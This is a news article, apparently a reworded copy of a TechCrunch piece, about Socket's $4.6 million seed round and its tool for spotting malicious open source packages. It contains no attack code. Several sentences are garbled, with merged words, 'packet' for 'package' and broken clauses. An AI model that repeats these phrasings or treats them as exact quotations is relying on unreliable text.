Socket lands $4.6 million to audit and intercept malicious open source code – TechCrunch


Securing the software supply chain is admittedly a bit of a dry topic, but knowing what components and codes go into your everyday devices and appliances is a critical part of the software development process that billions of people rely on every day.

Software is like any other product you build and ship; it relies on using components that others have built, often in the form of source code, and ensuring that it doesn’t break or have weaknesses that compromise the end product. Most of the software in the world relies on open source code written by developers who publish their work for anyone to use. It also means relying on trust that developers will always act in good faith. But projects are being abandoned and taken over by others who install backdoors or malware, or, as seen recently since Russia’s invasion of Ukraine, an increase in “protestware”, in which open source software developers change your code to erase the contents of Russian computers in protest against the Kremlin incursion.

Feross Aboukhadijeh, prolific open source maintainer and founder of Plugtold TechCrunch on a recent call that development teams often place too much faith in open-source code, which can be disastrous if a deliberate vulnerability is introduced into the supply chain and goes undetected.

Software is generally easier to fix than self-driving cars and other hardware that needs to be recalled. But the consequences of a software compromise can be disastrous and widespread. Corrupt software updates have led to the massive compromise of US federal government networks, ransomware attacks, and the targeting of corporate password managers to steal sensitive company secrets.

Aboukhadijeh based Socket earlier this year alongside a team of fellow open source maintainers who have seen firsthand some of the worst software supply chain attacks in the wild. So the team started working on creating an app that developers can use to detect and block the introduction of potentially malicious code into their projects from millions of open source code repositories.

The app connects to a GitHub developer’s account and performs dozens of known behaviors, checking for package issues such as potentially suspicious code changes, such as if an open-source package you depend on suddenly starts trying to communicate over the network or get a shell. access, which may indicate that the packet has been compromised.

Aboukhadijeh described Socket as offering a nutrition label of an open source package’s capabilities by illuminating a package’s access, permissions, and behaviors, such as installer scripts, that many types of malware use to attack themselves. log into a victim’s system.

“We can’t tell you for sure if a packet talking to the network is a bad sign or not, because what if it’s a web server – then obviously it’s going to have to! ” Aboukhadijeh said. But having this visibility built into the software building process is what developers need to prevent a supply chain attack. “It’s not a complicated AI or machine learning thing,” he said of his own product. “There is no way to hide that a package is running an install script, it is declared as part of the package. So why not bring this to the attention of a developer?”

Socket is still in its infancy and entering a crowded market, but is already attracting investment. The early-stage startup has raised $4.6 million in seed funding from more than a dozen angel investors and security executives, including former GitHub CEO Nat Friedman, co -founder of Keybase, Max Krohn, as well as Unusual Ventures, Village Global and South Park Commons. .

Aboukhadijeh told TechCrunch the funding will help expand the startup’s engineering, security analytics, and research teams to develop its tools for developers.

Read more:


Comments are closed.